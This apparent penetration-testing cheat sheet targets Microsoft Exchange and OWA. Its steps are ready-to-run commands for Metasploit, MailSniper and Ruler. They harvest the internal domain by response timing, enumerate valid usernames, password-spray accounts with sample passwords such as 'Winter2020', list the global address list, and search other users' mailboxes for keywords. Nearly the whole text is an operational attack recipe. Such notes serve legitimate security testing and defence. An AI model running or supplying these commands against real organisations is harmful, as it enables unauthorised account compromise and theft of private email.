Exchange

OWA - From domain to password spraying

1. Find a service to spray

Generally located at mail.target.com or target.com/owa

2. Obtain the domain name

Look for domain leak

use auxiliary/scanner/http/owa_login

Guessing based on time response

Invoke-DomainHarvestOWA -ExchHostname <target.com/owa> -DomainList <domain_guessing_list.txt> -OutFile <potential_domains.txt>

3. Obtain email addresses

See OSINT

Can validate credentials or just the login if the password is wrong but the username exists.

use auxiliary/scanner/http/owa_login

Invoke-UsernameHarvestOWA -ExchHostname <target.com/owa> -UserList <user_list.txt> -Domain <target.local> -OutFile <potential_usernames.txt>

4. Password spray

use auxiliary/scanner/http/owa_login

Invoke-PasswordSprayOWA -ExchHostname <target.com/owa> -userlist <user_list.txt> -Domain <target.local> -password <Winter2020>

MAPI over HTTP

Password spray

./ruler-linux64 -k --url https://autodiscover.<domain.int>/autodiscover/autodiscover.xml brute --users /tmp/user.txt --passwords /tmp/passwords.txt

Mailboxes permissions listing with Mail Sniper

1. Get global address list (OWA)

Get-GlobalAddressList -ExchHostname <mail.domain.int> -username <domain>\<user> -Password "<password>" -outfile global-address-list.txt

2. Dump mailboxes accesses (EWS)

Invoke-OpenInboxFinder -EmailList .\global-address-list.txt -Remote -ExchHostname <mail.domain.int>

3. Search for keywords in inbox

Invoke-SelfSearch -Mailbox <user@domain.int> -Remote -ExchHostname <mail.domain.int>

References

• https://swarm.ptsecurity.com/attacking-ms-exchange-web-interfaces/
• https://github.com/dafthack/MailSniper